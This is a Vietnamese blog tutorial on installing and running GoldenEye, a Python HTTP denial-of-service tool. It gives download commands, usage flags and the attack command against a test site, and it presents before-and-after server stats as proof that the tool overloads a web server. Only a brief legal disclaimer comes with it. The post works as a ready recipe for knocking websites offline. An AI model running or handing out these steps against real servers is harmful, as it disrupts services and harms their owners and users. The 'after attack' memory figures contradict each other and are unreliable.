Trải nghiệm thử GoldenEye, công cụ DOS hiệu quả

352
AZDIGI Hosting Số 1 Việt Nam

Giới thiệu về HTTP DOS Test Tool GoldenEye

  • GoldenEye là ứng dụng kiểm tra an ninh viết bằng Python.
  • GoldenEye là công cụ test DOS HTTP.
  • Attack Vector exploited: HTTP Keep Alive + NoCache

GoldenEye công cụ test DOS HTTP

Tools này khi sử dụng sẽ tạo ra lượng traffic lớn để đè tải nặng lên webserver khiến webserver quá tải và không đủ khả năng đáp ứng nhu cầu truy cập và sẽ bị “SẬP” và “DIE” ngay.

Nếu tấn công lâu Database trên webserver sẽ bị crash. Tuy nhiên nếu luồng tấn công trên bị chặn bởi tường lửa (firewall) thì máy tính đang cấn công có thể bị treo cứng do không nhả được các gói tin tới đích được.

VIDEO TEST

Các bước thực hiện

Ở máy tấn công, bạn cần tải và cài đặt Python

Note: Ở đây mình dùng máy tính cá nhân cài Win 10, mình sẽ cài Python lên Win 10, sau đó vào Store Win 10 tải Ubuntu 18 về và cài Python lên Ubuntu 18 này luôn.

 Cài đặt python

Cài đặt GoldenEye

Bạn thực hiện cài đặt với các lệnh như sau
 Trải nghiệp thử GoldenEye, công cụ DOS hiệu quả
 Trải nghiệp thử GoldenEye, công cụ DOS hiệu quả

root@dotrungquan:~# mkdir GoldenEye
root@dotrungquan:~# cd GoldenEye/
root@dotrungquan:~/GoldenEye# wget https://github.com/jseidl/GoldenEye/archive/master.zip
root@dotrungquan:~/GoldenEye# unzip master.zip

Run GoldenEye – DoS website

USAGE: ./goldeneye.py <url> [OPTIONS]
Ví dụ:
./goldeneye.py https://dotrunquan.info

 Trải nghiệp thử GoldenEye, công cụ DOS hiệu quả

OPTIONS:
Flag Description Default
-u, --useragents File with user-agents to use (default: randomly generated)
-w, --workers Number of concurrent workers (default: 50)
-s, --sockets Number of concurrent sockets (default: 30)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help

root@dotrungquan:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
python goldeneye.py http://www.goldeneyetestsite.com/

THE ATTACK

root@dotrungquan:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
python goldeneye.py http://www.goldeneyetestsite.com/

THE RESULT

Before attack
root@someserver [~]# free -m
total used free shared buffers cached
Mem: 1024 713 302 49 9 150
-/+ buffers/cache: 552 1001
Swap: 9990 40 160

root@someserver [~]# pgrep httpd | wc -l
11
After attack
root@serv1 [~]# free -m
total used free shared buffers cached
Mem: 1024 101 90 49 9 150
-/+ buffers/cache: 3544 190
Swap: 990 40 150
root@someserver [~]# pgrep httpd | wc -l
174

 

Chú ý: Nếu các bạn sử dụng công cụ này với mục đích xấu sẽ phải chịu mọi trách nhiệm pháp lý trước pháp luật, bài viết mang tính chất giới thiệu để các bạn mở rộng kiến thức của mình.

Tài liệu tham khảo: GitHub.

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments